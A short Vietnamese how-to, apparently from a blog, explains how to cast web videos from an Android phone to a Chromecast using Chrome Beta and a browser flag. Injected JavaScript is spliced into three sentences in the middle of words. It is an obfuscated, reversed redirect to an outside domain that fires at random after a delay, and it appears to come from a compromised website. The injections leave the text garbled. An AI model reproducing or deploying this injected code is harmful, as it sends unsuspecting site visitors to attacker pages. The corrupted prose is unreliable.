Chromecast – Cách xem video trên tất cả các website từ thiết bị Android

Chromecast được biết đến như một thiết bị nhỏ gọn và mạnh mẽ giúp tăng lực cho TV HD của nhà bạn. Dưới sự hỗ trợ mạnh mẽ từ Google chắc chắn trong tương lai không xa, Chromecast sẽ trở thành một thiết bị phổ biến và không thể thiếu trong mỗi gia đình.
Hiện nay các ứng dụng phổ biến dành cho Chromecast còn khá ít, tuy nhiên số lượng các website xem video trực tuyến tại Việt Nam thì rất nhiều, làm thế nào để tận dụng ưu điểm đó để đưa các nội dung online lên TV nhà bạn thông qua Chromecast?
Cùng Web Khéo Tay tham khảo qua một cách tuyệt vời sau nhé:
Hiện nay phần mềm Chrome trên android với phiên bản beta đã hỗ trợ hoàn toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslat tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);} toàn việc phát các nội dung từ HTML5 Player đến Chromecast của bạn.
Bước 1: Từ thiết bị Android của bạn, vào Play s toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslat tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);} tore (hoặc CH Play) tìm kiếm Chrome Beta với từ khóa “Chrome Beta” và tiến hành cài đặt.
Bước 2: mở trình duyệt Chrome Beta lên và nhập vào đường link sau: “chrome://flags/#enable-cast” (không dấu “)

Bước 3: Kích hoạt tính năng chia sẻ Chromecast.

Bước 4: Khởi động lại thiết bị android. Vào các website video như TV Zing, Zing MP3, nhaccuatui, xem videos với chế độ toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslat tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);} toàn màn hình, chạm vào video và bạn sẽ thấy biểu tượng của chromecast để có thể trình chiếu sang TV.

Chúc bạn thưởng thức Videos thật vui và thư giãn.
Lược dịch từ CNET